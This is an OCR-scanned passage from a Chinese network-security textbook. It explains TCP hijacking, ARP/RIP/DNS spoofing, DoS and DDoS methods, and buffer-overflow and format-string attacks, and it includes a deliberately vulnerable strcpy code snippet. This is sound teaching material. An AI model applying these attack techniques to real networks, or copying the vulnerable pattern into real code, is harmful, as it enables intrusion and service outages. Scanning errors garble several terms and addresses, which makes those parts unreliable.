链 路 。 另 外 ，TCP 在 进行 数据 传输 时 ，TCP 报 文 首部 的 两 个 字段 序号 (Seq) 和 确认 序号 
(Ackseq) 非 常 重要 。 序 号 (Seq) 和 确认 序号 (Ackseq) 是 与 所 携带 TCP 数据 净 荷 (Payload) 的 多 
少 有 数值 上 的 关系 : 序号 字段 (Seq) 指 出 了 本 报 文中 传送 的 数据 在 发 送 主机 所 要 传送 的 整 
个 数据 流 中 的 顺序 号 ， 而 确认 序号 字段 (Ackseq) 指 出 了 发 送 本 报 文 的 主机 希望 接收 的 对 方 
主机 中 下 一 个 八 位 组 的 顺序 号 。 因 此 ， 对 于 一 台 主 机 来 说 ， 其 收发 的 两 个 相 邻 TCP 报 文 
之 间 的 序号 和 确认 序号 的 关系 为 : 它 所 要 发 出 的 报 文中 的 seq 值 应 等 于 它 所 刚 收 到 的 报 文 
中 的 ackseq 的 值 ， 而 它 所 要 发 送 报 文中 ackseq 的 值 应 为 它 所 收 到 报 文 中 seq 的 值 加 上 该 
报 文 中 所 发 送 的 TCP 净 荷 的 长 度 。 

TCP 会 话 劫持 的 攻击 方式 可 以 对 基于 TCP 的 任何 应 用 发 起 攻击 ， 如 HTTP、FTP、 
Telnet 等 。 对 于 攻击 者 来 说 ， 所 必须 要 做 的 就 是 窥探 到 正在 进行 TCP 通信 的 两 台 主 机 之 间 
传送 的 报 文 ， 这 样 攻击 者 就 可 以 得 知 该 报 文 的 源 卫 、 源 TCP 端口 号 、 目 的 IP、 目 的 TCP 
端 号 ， 从 而 可 以 得 知 其 中 一 台 主 机 对 将 要 收 到 的 下 一 个 TCP 报 文 段 中 seq 和 ackseq 值 的 
要 求 。 这 样 ， 在 该 合法 主机 收 到 另 一 台 合 法 主机 发 送 的 TCP 报 文 前 ， 攻 击 者 根据 所 截获 
的 信息 向 该 主机 发 出 一 个 带 有 净 荷 的 TCP 报 文 ， 如 果 该 主机 先 收 到 攻击 报 文 ， 就 可 以 把 
合法 的 TCP 会 话 建立 在 攻击 主机 与 被 攻击 主机 之 间 。 带 有 净 荷 的 攻击 报 文 能 够 使 被 攻击 
主机 对 下 一 个 要 收 到 的 TCP 报 文中 的 确认 序号 (Ackseq) 的 值 的 要 求 发 生变 化 ， 从 而 使 另 一 
台 合 法 的 主机 向 被 攻击 主机 发 出 的 报 文 被 攻击 主机 拒绝 。TCP 会 话 劫持 攻击 方式 的 好 处 在 
于 使 攻击 者 避 开 了 被 攻击 主机 对 访问 者 的 身份 验证 和 安全 认证 ， 从 而 使 攻击 者 直接 进入 对 
被 攻击 主机 的 访问 状态 ， 因 此 对 系统 安全 构成 的 威胁 比较 严重 。 

3) ”ARP 欺骗 

在 浏览 器 里 面 输入 网 址 时 ，DNS 服务 器 会 自动 把 它 解 析 为 PP 地 址 ， 浏 览 器 实际 上 查 
找 的 是 卫 地 址 而 不 是 网 址 。 那 么 人 P 地 址 是 如 何 转换 为 第 二 层 物理 地 址 ( 即 MAC 地 址 ) 的 
呢 ? 在 局 域 网 中 ， 这 是 通过 ARP 协议 来 完成 的 。ARP 协议 对 网 络 安全 具有 重要 的 意义 。 
通过 伪造 人 P 地 址 和 MAC 地 址 实现 ARP 欺骗 ， 能 够 在 网 络 中 产生 大 量 的 ARP 通信 量 使 网 
络 阻塞 。 所 以 我 们 应 深入 理解 ARP 协议 。 

ARP 协议 是 “Address Resolution Protocol”( 地 址 解析 协议 ) 的 缩写 。 在 局 域 网 中 ， 网 
络 中 实际 传输 的 是 “ 帧 ”， 帧 里 面 是 有 目标 主机 的 MAC 地 址 的 。 在 以 太 网 中 ， 一 个 主机 
要 和 另 一 个 主机 进行 直接 通信 ， 必 须要 知道 目标 主机 的 MAC 地 址 。 但 这 个 目标 MAC 地 
址 是 如 何 获得 的 呢 ? 它 就 是 通过 地 址 解析 协议 获得 的 。 所 谓 “ 地 址 解析 ”就 是 主机 在 发 送 
帧 前 将 目标 IP 地 址 转换 成 目标 MAC 地 址 的 过 程 。ARP 协议 的 基本 功能 就 是 通过 目标 设 
备 的 了 P 地 址 ， 查 询 目标 设备 的 MAC 地 址 ， 以 保证 通信 的 顺利 进行 。 

ARP 协议 的 工作 原理 如 下 。 

在 每 台 安 装 有 TCP/IP 协议 的 电脑 里 都 有 一 个 ARP 缓存 表 ， 表 里 的 外 地址 与 MAC 地 
址 是 一 一 对 应 的 ， 如 表 9-1 所 示 。 
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表 9-1 IP 地 址 与 MAC 地 址 的 对 应 关系 


IP 地址 MAC 地 址 


192.168.1.1 | 00-aa-00-62-c6-09 


192.168.1.2 | 00-aa-00-62-c5-03 
192.168.1.3 | 03-aa-01-75-c3-06 


我 们 以 主机 A(192.168.1.5) 向 主机 B(192.168.1.1) 发 送 数据 为 例 。 当 发 送 数据 时 ， 主 机 
A 会 在 自己 的 ARP 缓存 表 中 寻找 是 否 有 目标 卫 地 址 。 如 果 找 到 了 ， 也 就 知道 了 目标 
MAC 地 址 ， 直 接 把 目标 MAC 地 址 写 入 帧 里 面 发 送 就 可 以 了 ; 如果 在 ARP 缓存 表 中 没有 
找到 相对 应 的 IP 地 址 ， 主 机 A 就 会 在 网 络 上 发 送 一 个 广播 ， 目标 MAC 地 址 是 
“FF.FF.FF.FF.FF.FF”， 这 表示 向 同一 网 段 内 的 所 有 主机 发 出 这 样 的 询问 : “192.168.1.1 
的 MAC 地 址 是 什么 ? ”网 络 上 其 他 主机 并 不 响应 ARP 询问 ， 只 有 主机 B 接收 到 这 个 帧 
时 ， 才 向 主机 A 做 出 这 样 的 回应 : “192.168.1.1 的 MAC 地 址 是 00-aa-00-62-c6-09”。 这 
样 ， 主 机 A 就 知道 了 主机 B 的 MAC 地 址 ， 它 就 可 以 向 主机 B 发 送信 息 了 。 同 时 它 还 更 
新 了 自己 的 ARP 缓存 表 ， 下 次 再 向 主机 B 发 送信 息 时 ， 直 接 从 ARP 缓存 表 里 查 找 就 可 以 
了 。ARP 缓存 表 采 用 了 老化 机 制 ， 在 一 段 时 间 内 如 果 表 中 的 某 一 行 没有 使 用 ， 就 会 被 删 
除 ， 这 样 可 以 大 大 减少 ARP 缓存 表 的 长 度 ， 加 快 查询 速度 。 

ARP 缓存 表 是 可 以 查看 的 ， 也 可 以 添加 和 修改 。 在 命令 提示 符 下 ， 输入 “arp -a” 就 
可 以 查看 ARP 缓存 表 中 的 内 容 了 ， 如 图 9-7 所 示 。 


9-7 ARP 缓存 表 


用 “arp -d” 命 令 可 以 删除 ARP 表 中 某 一 行 的 内 容 ， 用 “arp -s” 可 以 手动 在 ARP 表 
中 指定 瑟 地 址 与 MAC 地 址 的 对 应 。 
下 面 看 一 下 ARP 欺骗 原理 : 
段 设 一 个 网 络 环境 中 ， 网 内 有 3 台 主 机 ， 分 别 为 A、B、C。 主 机 详细 信息 描述 


如 下 : 
A 的 地 址 IP: 192.168.10.1 MAC: AA-AA-AA-AA-AA-AA; 
B 的 地 址 IP: 192.168.10.2 MAC: BB-BB-BB-BB-BB-BB; 
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C 的 地 址 IP: 192.168.10.3 MAC: CC-CC-CC-CC-CC-CC。 

正常 情况 下 A 和 C 之 间 的 进行 通信 ,但 是 此 时 B 向 A 发 送 一 个 自己 伪造 的 ARP 应 
答 ， 而 这 个 应 答 中 的 数据 发 送 方 IP 地 址 是 192.168.1.3(C 的 IP 地 址 )，MAC 地 址 是 BB- 
BB-BB-BB-BB-BB(C 的 MAC 地 址 本 来 应 该 是 CC-CC-CC-CC-CC-CC， 这 里 被 伪造 了 )。 

当 A 接收 到 B 伪造 的 ARP 应 答 时 ， 就 会 更 新 本 地 的 ARP 缓冲 (A 被 欺骗 了 )， 这 时 B 
就 伪装 成 C 了 。 同 时 ，B 同样 向 C 发 送 一 个 ARP 应 答 ， 应 答 包 中 发 送 方 IP 地 址 是 
192.168.10.1(A 的 全 地 址 )，MAC 地 址 是 BB-BB-BB-BB-BB-BB(A 的 MAC 地 址 本 来 应 该 
是 AA-AA-AA-AA-AA-AA)。 当 C 收 到 B 伪造 的 ARP 应 答 ， 也 会 更 新 本 地 ARP 缓存 (C 
也 被 欺骗 了 )， 这 时 B 就 伪装 成 了 A。 这 样 主机 A 和 C 都 被 主机 B 欺骗 ,A 和 C 之 间 通 
信 的 数据 都 经 过 了 B。 主 机 B 完全 可 以 知道 它们 之 间 说 的 是 什么 。 这 就 是 典型 的 ARP 其 

实际 上 ， 典 型 的 ARP 欺骗 分 为 两 种 : 一 种 是 对 路 由 器 ARP cache 表 的 欺骗 ， 另 一 种 
是 对 内 网 PC 的 网 关 欺 骗 。 

第 一 种 ARP 欺骗 的 原理 是 截获 网 关 数 据 。 它 发 给 路 由 器 一 系列 错误 的 内 网 MAC 地 
址 ， 并 按照 一 定 的 频率 不 断 进 行 ， 使 真实 的 地 址 信息 无 法 通过 更 新 保存 在 路 由 器 的 
ARPcache 中 ， 结 果 路 由 器 的 所 有 数据 只 能 发 送 给 错误 的 MAC 地 址 ， 造 成 正常 PC 无 法 收 
到 信息 。 如 图 9-8 所 示 。 


9-8” 对 路 由 器 ARP cache 表 的 欺骗 


第 二 种 ARP 欺骗 的 原理 是 伪造 网 关 。 它 的 原理 是 建立 假 网 关 ， 让 被 欺骗 的 PC 向 假 
网 关 发 数据 ， 而 不 是 通过 正常 的 网 关连 接 到 Intemet。 从 被 骗 PC 角度 看 就 是 上 不 了 网 ， 
“网 络 掉 线 了 ”。 

ARP 欺骗 能 够 得 以 实现 的 主要 原因 有 : ARP 协议 设计 之 初 没有 考虑 安全 问题 ， 所 以 
任何 计算 机 都 可 以 发 送 虚 假 的 ARP 数据 包 ; ARP 协议 的 无 状态 性 使 响应 数据 包 和 请 求 数 
据 包 之 间 没 有 什么 关系 ， 如 主机 收 到 一 个 ARP 响应 却 无 法 知道 是 否 真 的 发 送 过 对 应 的 
ARP 请 求 ， ARP 缓存 需要 定时 更 新 ， 这 就 给 攻击 者 以 可 乘 之 机 。 但 是 ，ARP 欺骗 的 主要 
环境 必须 是 局 域 网 ， 也 就 是 说 攻击 者 必须 先 取 得 进入 局 域 网 的 合法 身份 后 才能 进行 ARP 
欺骗 。 
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4) ”RIP( 路 由 信息 协议 ) 路 由 欺骗 

RIP 协议 用 于 自治 系统 内 传播 路 由 信息 。 路 由 器 在 收 到 RIP 数据 报时 一 般 不 作 检查 。 
攻击 者 可 以 声称 他 所 控制 的 路 由 器 A 可 以 最 快 的 到 达 某 一 站 点 B， 从 而 诱 使 发 往 B 的 数 
据 包 由 A 中 转 。 由 于 A 受 攻击 者 控制 ， 攻 击 者 可 侦 听 、 算 改 数据 。 

RIP 协议 处 于 UDP 协议 的 上 层 ，RIP 所 接受 的 路 由 修改 信息 都 封装 在 UDP 的 数据 报 
中 ，RIP 在 520 端口 上 接受 来 自 远程 路 由 器 的 路 由 修改 信息 ， 并 对 本 地 的 路 由 表 作 相应 的 
修改 ， 同 时 通知 其 他 的 路 由 器 。RIP 路 由 欺骗 的 一 种 简单 途径 是 在 端口 520 上 通过 UDP 
广播 非法 路 由 信息 ， 在 一 般 的 Unix 系统 中 ， 没 有 特权 使 用 RIP 的 任何 用 户 都 可 以 利用 
RIP 对 网 络 中 所 有 被动 参与 RIP 协议 者 发 起 路 由 欺骗 攻击 。 如 果 RIP 作为 内 部 路 由 上 的 协 
议 ， 或 者 被 动工 作 模 式 涉及 一 个 乃至 多 个 路 由 器 时 ， 这 种 攻击 造成 的 危害 必定 更 大 。 

5) DNS 欺骗 攻击 

DNS 是 目前 大 部 分 网 络 应 用 的 基础 ， 对 它 的 攻击 将 影响 整个 Intemet 的 正常 运转 。 
DNS 欺骗 攻击 是 攻击 者 常用 的 手法 ， 它 具有 隐蔽 性 强 、 打 击 面 广 、 攻 击 效果 明显 的 

网 络 攻击 者 通常 通过 如 下 几 种 方法 进行 DNS 欺骗 。 

e@ ”缓存 感染 攻击 者 会 熟练 地 使 用 DNS 请 求 ， 将 数据 放 入 一 个 没有 设防 的 DNS 服 
务 器 的 缓存 当中 。 这 些 缓存 信息 会 在 客户 进行 DNS 访问 时 返回 给 客户 ， 从 而 将 
客户 引导 到 入 侵 者 所 设置 的 运行 木马 的 WEB 服务 器 或 邮件 服务 器 上 ， 然 后 黑客 
从 这 些 服务 器 上 获取 用 户 信息 。 

@ DNS 信息 劫持 : 入 侵 者 通过 监听 客户 端 和 DNS 服务 器 的 对 话 ， 通 过 猜测 服务 器 
响应 给 客户 端的 DNS 查询 ID。 每 个 DNS 报 文 包括 一 个 相关 联 的 16 位 号 ，DNS 
服务 器 根据 这 个 ID 号 获取 请 求 源 位 置 。 黑 客 在 DNS 服务 器 前 将 虚假 的 响应 交 给 
用 户 ， 从 而 欺骗 客户 端 去 访问 恶意 的 网 站 。 

@ DNS 重 定向 : 攻击 者 能 够 将 DNS 名 称 查 询 重 定向 到 恶意 DNS 服务 器 。 这 样 攻 
击 者 可 以 获得 DNS 服务 器 的 写 权 限 。 


9.3.3 ”拒绝 服务 攻击 


拒绝 服务 (DoS) 攻 击 是 目前 黑客 经 常 采用 而 难以 防范 的 攻击 手段 ， 广 义 而 言 ， 一 些 利 
用 网 络 安全 防护 措施 不 足 如 口令 破解 ， 非 法 访问 等 方法 ， 导 致 用 户 不 能 或 不 敢 继续 使 用 正 
常服 务 ， 我 们 也 可 以 称 其 为 拒绝 服务 攻击 。 通 俗 地 讲 ， 拒 绝 服务 相当 于 火车 满载 的 时 候 不 
能 再 让 乘客 进入 一 样 。 它 往往 用 超出 被 攻击 目标 处 理 能 力 的 海量 数据 包 消 耗 可 用 系统 、 带 
宽 资 源 ， 最 终 致 使 网 络 服务 瘫 疾 的 一 种 攻击 手段 。 

拒绝 服务 攻击 的 类 型 按 其 攻击 形式 划分 包括 导致 异常 型 、 资 源 耗 尽 型 、 利 用 系统 
漏洞 型 。 

(1) 导致 异常 型 拒绝 服务 攻击 利用 软 硬 件 实现 上 的 编程 缺陷 ， 导 致 其 出 现 异常 ， 从 而 
使 其 拒绝 服务 。 如 著名 的 ping of death 攻击 和 利用 IP 协议 栈 对 IP 分 片 重 又 处 理 异 常 的 
Theadrop 攻击 。 

(2) 资源 耗 尽 型 拒绝 服务 攻击 则 通过 大 量 消耗 资源 ， 使 得 攻击 目标 由 于 资源 耗 尽 不 能 
提供 正常 的 服务 。 视 资源 类 型 的 不 同 可 分 为 带宽 耗 尽 型 和 系统 资源 耗 尽 型 两 类 。 带 宽 耗 尽 
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攻击 的 本 质 是 攻击 者 通过 放大 等 技巧 消耗 掉 目 标 网 络 的 所 有 可 用 带宽 。 著 名 的 如 Smurf 攻 
击 ， 冒 充 目标 网 络 向 多 个 广播 地 址 发 送 ping 包 ， 造 成 数量 庞大 的 ping 响应 淹没 攻击 目标 
网 络 。 

系统 资源 耗 尽 攻击 指 对 系统 内 存 、CPU 或 程序 中 的 其 他 资源 进行 消耗 ， 使 其 无 法 满 
足 正 常 提供 服务 的 需求 。 著 名 的 SYN Flood 攻击 即 是 通过 向 目标 服务 发 送 大 量 的 SYN 包 
造成 服务 的 连接 队列 耗 尽 ， 无 法 再 为 其 他 正常 的 连接 请 求 提供 服务 。 

在 如 图 9-3 所 示 的 三 次 握手 中 ， 在 第 一 步 中 ， 客 户 端 向 服务 端 提出 连接 请 求 。 这 时 
TCP SYN 标志 置 位 。 客 户 端 告诉 服务 端 序列 号 区 域 合 法 ， 需 要 检查 。 客 户 端 在 TCP 报头 
的 序列 号 区 中 插入 自己 的 ISN。 服 务 端 收 到 该 TCP 分 段 后 ， 在 第 二 步 以 自己 的 ISN 回应 
(SYN 标志 置 位 )， 同 时 确认 收 到 客户 端的 第 一 个 TCP 分 段 (ACK 标志 置 位 )。 在 第 三 步 
中 ， 客 户 端 确认 收 到 服务 端的 ISN(ACK 标志 置 位 )。 到 此 为 止 建立 完整 的 TCP 连接 ， 开 
始 全 双 工 模式 的 数据 传输 过 程 。 

问题 就 出 在 TCP 连接 的 三 次 握手 中 ， 假 设 一 个 用 户 向 服务 器 发 送 了 SYN 报 文 后 突然 
死机 或 掉 线 ， 那 么 服务 器 在 发 出 SYN+ACK 应 答 报 文 后 是 无 法 收 到 客户 端的 ACK 报 文 的 
(第 三 次 握手 无 法 完成 )， 这 种 情况 下 服务 器 端 一 般 会 重 试 (再 次 发 送 SYN+ACK 给 客户 端 ) 
并 等 待 一 段 时 间 后 丢弃 这 个 未 完成 的 连接 ， 这 段 时 间 的 长 度 我 们 称 为 SYN Timeout， 一 般 
来 说 这 个 时 间 是 分 钟 的 数量 级 (大 约 为 30 秒 一 2 分 钟 )， 一 个 用 户 出 现 异 常 导 致 服务 器 的 一 
个 线程 等 待 1 分 钟 并 不 是 什么 很 大 的 问题 ， 但 如 果 有 一 个 恶意 的 攻击 者 大 量 模拟 这 种 情 
况 ， 服 务 器 端 将 为 了 维护 一 个 非常 大 的 半 连 接 列 表 而 消耗 非常 多 的 资源 一 数 以 万 计 的 半 连 
接 ， 即 使 是 简单 的 保存 并 遍历 也 会 消耗 非常 多 的 CPU 时 间 和 内 存 ， 何 况 还 要 不 断 对 这 个 
列表 中 的 他 进行 SYN+ACK 的 重 试 。 实 际 上 如 果 服 务 器 的 TCP/IP 栈 不 够 强大 ， 最 后 的 结 
果 往 往 是 堆栈 溢出 骨 演 ， 即 使 服务 器 端的 系统 足够 强大 ， 服 务 器 端 也 将 忙于 处 理 攻击 者 伪 
造 的 TCP 连接 请 求 而 无 暇 理 皮 客户 的 正常 请 求 (毕竟 客户 端的 正常 请 求 比率 非常 之 小 )， 此 
时 从 正常 客户 的 角度 看 来 ， 服 务 器 失去 响应 ， 这 种 情况 我 们 称 作 : 服务 器 端 受 到 了 SYN 
Flood 攻击 (SYN 洪水 攻击 )， 如 图 9-9 所 示 。 


服务 器 


图 9-9 ”Syn Flood 攻击 下 不 会 完成 三 次 握手 
(3) 除 上 述 拒绝 攻击 外 ， 还 有 利用 系统 漏洞 来 进行 拒绝 服务 攻击 ， 系 统 漏洞 是 包含 在 
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操作 系统 或 应 用 程序 中 与 安全 相关 的 系统 缺陷 。 这 些 缺 陷 大 多 数 是 由 于 错误 的 编程 、 粗 心 
的 源 代码 审核 或 一 些 不 当 的 绑 定 所 造成 的 ， 常 被 攻击 者 利用 。 

例如 微软 的 Windows Vista 操作 系统 中 存在 的 安全 漏洞 。 这 个 安全 漏洞 多 许 rootkits 
在 使 用 Vista 操作 系统 的 计算 机 上 隐藏 起 来 或 者 实施 拒绝 服务 器 攻击 。 这 个 安全 漏洞 可 以 
造成 系统 崩溃 ， 它 存在 于 Vista 的 网 络 输入 /输出 子 系统 中 。 某 些 发 给 iphlpapi.dll 应 用 程序 
编程 接口 的 请 求 能 够 引起 缓存 溢出 故障 ， 破 坏 Vista 内 核 的 内 存 ， 导 致 系统 蓝屏 死机 。 攻 
击 者 可 以 利用 这 个 缓存 溢出 故障 注入 代码 ， 从 而 破坏 客户 机 的 安全 。 攻 击 者 能 够 利用 这 个 
安全 漏洞 实施 拒绝 服务 攻击 ， 关 闭 用 户 的 计算 机 。 由 于 这 个 安全 漏洞 出 现在 Vista 的 
Netio.sys 组 件 中 ， 它 很 可 能 允许 隐藏 rootkits 。 

Windows GDI Plus library 存在 处 理 畸 形 图 像 漏洞 ， 可 能 引起 远程 拒绝 服务 。 微 软 公司 
的 Windows 操作 系统 的 GDI Plus library(Gdiplus.dll))， 在 处 理 畸 形 图 像 时 存在 零 错 误 ， 攻 
击 者 可 以 通过 构建 一 个 包含 特殊 图 像 的 恶意 Web 页 面 来 诱骗 用 户 点 击 ， 导 致 引起 远程 拒 
绝 服务 。Windows 存在 处 理 SMB 畸形 网 络 报 文 漏洞 ， 可 能 引起 远程 拒绝 服务 。 微 软 公 司 
的 Windows 操作 系统 的 Server 驱动 (srv.sys) 在 处 理 某 些 SMB 数据 时 存在 空 指针 引用 错 
误 ， 远 程 攻 击 者 可 以 利用 此 漏洞 导致 Windows 系统 崩溃 死机 。 如 果 远 程 攻击 者 向 有 漏洞 
的 系统 发 送 了 恶意 构造 的 畸形 SMB 网 络 报 文 的 话 ， 就 可 能 导致 蓝屏 死机 。 

数据 链 路 层 的 拒绝 服务 攻击 受 协议 本 身 限 制 ， 只 能 发 生 在 局 域 网 内 部 ， 这 种 类 型 的 攻 
击 比较 少见 。 针 对 IP 层 的 攻击 主要 是 针对 目标 系统 处 理 瑟 包 时 所 出 现 的 漏洞 进行 的 ， 如 
IP 碎片 攻击 。 针 对 传输 层 的 攻击 在 实际 中 出 现 较 多 ， 如 上 文 提 到 的 SYN Flood， 还 有 
UDP Flood 等 。 

下 面 再 看 一 下 UDP Flood 拒绝 服务 攻击 。 

由 于 UDP 协议 是 一 种 无 连接 的 服务 ， 在 UDP Flood 攻击 中 ， 攻 击 者 可 大 量 伪 造 源 卫 
地 址 的 小 UDP 包 。 但 是 ， 由 于 UDP 协议 是 无 连接 性 的 ， 所 以 只 要 开 了 一 个 UDP 的 端口 
来 提供 相关 服务 的 话 ， 就 可 针对 相关 的 服务 进行 攻击 。 如 QQ 就 是 基于 UDP 协议 的 ， 网 
上 有 种 工具 能 发 送 大 量 的 包 对 目标 进行 攻击 ， 从 而 使 对 方 QQ 被 迫 下 线 ， 如 果 是 对 其 他 的 
服务 进行 的 话 ， 严 重 的 可 能 会 让 服务 器 死机 。 


9.3.4 数据 驱动 攻击 


数据 驱动 攻击 是 通过 向 某 个 程序 发 送 数据 ， 以 产生 非 预 期 结果 的 攻击 ， 通 常 为 攻击 者 
给 出 访问 目标 系统 的 权限 。 数 据 驱 动 攻击 分 为 缓冲 区 溢出 攻击 、 格 式 化 字符 串 攻击 、 输 入 
验证 攻击 、 同 步 漏洞 攻击 和 发 掘 信任 漏洞 攻击 等 。 


1. 缓冲 区 溢出 攻击 


所 谓 缓冲 区 ， 简 单 说 来 是 程序 运行 时 内 存 中 的 一 块 连续 的 区 域 。 缓 冲 区 溢出 指 当 计算 
机 程序 向 缓冲 区 内 填充 的 数据 位 数 超 过 了 缓冲 区 本 身 的 容量 。 溢 出 的 数据 履 盖 在 合法 数 
据 上 。 

操作 系统 所 使 用 的 缓冲 区 又 被 称 为 堆栈 ， 在 各 个 操作 进程 之 间 ， 指 令 被 临时 存储 在 堆 
栈 当 中 ， 堆 栈 也 会 出 现 缓冲 区 溢出 。 缓 冲 区 溢出 攻击 是 通过 往 程序 的 缓冲 区 写 超出 其 长 度 
的 内 容 ， 造 成 缓冲 区 的 溢出 ， 从 而 破坏 程序 的 堆栈 ， 使 程序 转 而 执行 其 他 指令 ， 以 达到 攻 
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击 目的 的 攻击 方式 。 

为 了 进行 有 效 的 攻击 ， 攻 击 者 必须 完成 如 下 的 两 个 步骤: 第 一 ， 在 程序 的 地 址 空间 里 
安排 适当 的 代码 ; 第 二 ， 控 制程 序 的 执行 ， 使 其 跳 转 到 攻击 者 安排 的 地 址 空间 执行 攻击 代 
码 程序 运行 时 ， 其 对 应 的 进程 在 内 存 中 布局 可 如 图 9-10 所 示 ， 进 程 把 内 存 分 为 五 个 区 
域 : 代码 段 、 数 据 段 、BSS 段 、 堆 和 栈 段 。 


代码 段 (Text Section) 
数据 段 (TextSection) 


图 9-10 ”程序 运行 时 在 内 存 空间 的 布局 


根据 被 覆盖 数据 的 位 置 的 不 同 ， 缓 冲 区 溢出 分 为 堆栈 溢出 、 堆 溢出 和 BSS 溢出 三 
种 。 而 发 生 溢出 后 ， 进 程 可 能 的 表现 也 有 三 种 : 第 一 种 是 运行 正常 ， 这 时 ， 被 覆盖 的 是 无 
用 数据 ， 并 且 没 有 发 生 访问 违例 ， 第 二 种 是 运行 出 错 ， 包 括 输出 错误 和 非法 操作 等 ， 第 三 
种 就 是 受到 攻击 ， 程 序 开 始 执行 有 害 代码 ， 此 时 ， 哪 些 数据 被 覆盖 和 用 什么 数据 来 覆盖 都 
是 攻击 者 精心 设计 的 。 缓 冲 区 溢出 原理 很 简单 ， 如 下 所 示 : 

void function (char * szParal) 

| char buffer[16]; 

strcpy (buffer, szParal); 

i 

程序 中 利用 strcpy0O 函 数 将 szParal 中 的 内 容 拷贝 到 buff 中 ， 只 要 szParal 的 长 度 大 于 
16， 就 会 造成 缓冲 区 溢出 。 存 在 类 似 strepy0 函 数 这 样 问题 的 C 语言 函数 还 有 : strcat()、 
gets()、scanf() 等 。 

当然 ， 随 便 往 缓冲 区 填写 数据 使 它 溢出 一 般 只 会 出 现 “ 分 段 错误 ”， 而 不 能 达到 攻击 
的 目的 。 最 常见 的 手段 是 通过 制造 缓冲 区 溢出 使 程序 运行 一 个 用 户 shell， 再 通过 shell 执 
行 其 他 命令 ， 如 果 该 shell 有 管理 员 权 限 ， 就 可 以 对 系统 进行 任意 操作 。 


2. 格式 化 字符 串 攻击 


格式 化 字符 串 攻 击 也 是 缓冲 区 溢出 攻击 的 一 种 ， 它 主要 是 利用 由 于 格式 化 函数 的 微妙 
程序 设计 错误 造成 的 安全 漏洞 ， 通 过 传递 精心 编制 的 含有 格式 化 指令 的 文本 字符 串 ， 以 使 
目标 程序 执行 任意 命令 。 
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3. 输入 验证 攻击 


输入 验证 攻击 针对 程序 未 能 对 输入 进行 有 效 验 证 的 安全 漏洞 ， 使 得 攻击 者 能 够 让 程序 
执行 指定 的 命令 。 最 为 著名 的 是 PHF 攻击 ，PHF 是 早期 Apache Web 服务 器 的 一 个 标准 
CGI 脚本 ， 由 于 其 没有 确切 地 分 析 并 验证 输入 的 有 效 性 ， 导 致 其 会 以 运行 Web 服务 器 程 
序 的 用 户 ID 的 特权 ， 执 行 攻 击 者 指定 的 任何 命令 。 


4. 同步 漏洞 攻击 和 发 掘 信任 漏洞 攻击 


同步 漏洞 攻击 利用 程序 在 处 理 同步 操作 时 的 缺陷 ， 例 如 竞争 状态 、 信 号 处 理 等 问题 ， 
以 获取 更 高 权限 的 访问 。 

发 掘 信任 漏洞 攻击 则 是 利用 程序 滥 设 的 信任 关系 获取 访问 权 的 一 种 方法 ， 著 名 的 有 
Win32 平台 下 互 为 映像 的 本 地 和 域 Administrator 凭证 、LSA(Local Security Authority) 密 码 
和 Unix 平台 下 SUID 权限 的 滥用 以 及 X Windows 系统 的 xhost 认证 机 制 等 。 

分 布 式 拒绝 服务 攻击 (DDoS) 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 。 在 
早期 ， 拒 绝 服务 攻击 主要 是 针对 处 理 能 力 比较 弱 的 单机 ， 如 个 人 PC 或 是 窄带 宽 连 接 的 网 
站 。 对 拥有 高 带宽 连接 ， 高 性 能 设备 的 网 站 影响 不 大 。 随 着 计算 机 与 网 络 技术 的 发 展 ， 计 
算 机 的 处 理 能 力 迅速 增长 ， 内 存 大 大 增加 ， 同 时 也 出 现 了 千 兆 级 别 的 网 络 ， 这 使 得 DoS 
攻击 的 困难 程度 加 大 了 。 例 如 ， 亚 意 主机 进行 攻击 的 时 候 发 包 速 率 为 1000 个 / 秒 ， 但 网 卡 
可 以 每 秒 钟 处 理 5000 个 包 ， 显 然 这 样 的 攻击 是 不 会 产生 任何 效果 的 。 但 是 换个 角度 考虑 
问题 ， 如 果 现 在 有 10 台 同 样 型 号 的 恶意 主机 同时 针对 该 目的 主机 发 起 攻击 ， 那 么 情况 会 
怎样 ? 结果 必然 是 受到 攻击 的 主机 达到 了 处 理 极限 而 拒绝 服务 。 

分 布 式 拒绝 服务 攻击 手段 应 运 而 生 。DDoS 的 实现 是 借助 数 百 ， 甚 至 数 千 台 被 植 入 攻 
击 守 护 进 程 的 倪 偶 主机 同时 发 起 的 集团 作战 行为 ， 在 这 种 几 百 、 几 千 对 一 的 较量 中 ， 网 络 
服务 提供 商 所 面 对 的 破坏 力 是 空前 巨大 的 。 

由 于 目前 互联 网 上 广泛 使 用 的 IPv4 协议 存在 缺陷 ， 彻 底 杜绝 DDoS 是 非常 困难 的 ， 
目前 主要 通过 不 断 加强 技 术 能 力 和 协调 能 力 来 防范 DDoS 事件 ，DDoS 攻击 原理 如 图 9-11 
所 示 。 


DDos 守护 进程 


图 9-11 DDoS 攻击 原理 
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攻击 者 进行 DDoS 攻击 的 时 候 ， 会 经 过 以 下 步骤 。 

1) ”搜集 了 解 目标 的 情况 

攻击 者 通常 会 非常 关心 以 下 内 容 : 被 攻击 目标 主机 数目 、 地 址 情况 、 目 标 主机 的 配置 
和 性 能 ， 以 及 目标 宽带 。 比 如 ， 我 们 利用 Windows 操作 系统 的 漏洞 去 攻击 装 有 Linux 操 
作 系 统 的 机 器 显然 是 不 明智 的 。 

2) 占领 倪 偶 主机 

攻击 者 如 果 不 加 掩饰 ， 直 接 用 本 机 的 卫 去 连接 对 方 主机 发 动 进攻 ， 就 可 能 有 被 发 现 
的 危险 。 因 此 ， 为 了 使 自己 不 被 发 现 ， 攻 击 者 常常 利用 前 部 分 讲 过 的 扫描 技术 ， 随 机 地 或 
者 是 有 针对 性 地 去 发 现存 有 漏洞 的 机 器 ， 获 得 这 些 主机 的 控制 权限 ， 使 其 成 为 倪 偶 机 。 比 
如 常见 的 Unicode 漏洞 、CGI 漏洞 IPC$ 漏 洞 、 缓 冲 区 溢出 等 都 是 黑客 希望 看 到 的 扫描 结 
果 。 另 外 ， 为 了 达到 需要 的 攻击 力度 ， 单 靠 一 台 或 数 台 机 器 对 一 个 大 型 系统 的 攻击 是 不 够 
的 ， 因 此 攻击 者 需要 大 量 的 倪 偶 机 用 于 增强 攻击 的 猛烈 程度 。 这 些 倪 候 机 器 最 好 具有 良好 
的 性 能 和 充足 的 资源 ， 如 强 的 计算 能 力 和 大 的 宽带 等 。 

3) ”实际 攻击 

黑客 发 布 攻击 指令 ， 所 有 受 控 的 倪 偶 机 参与 攻击 行为 。 倪 偶 主 机 中 的 DDoS 攻击 程序 
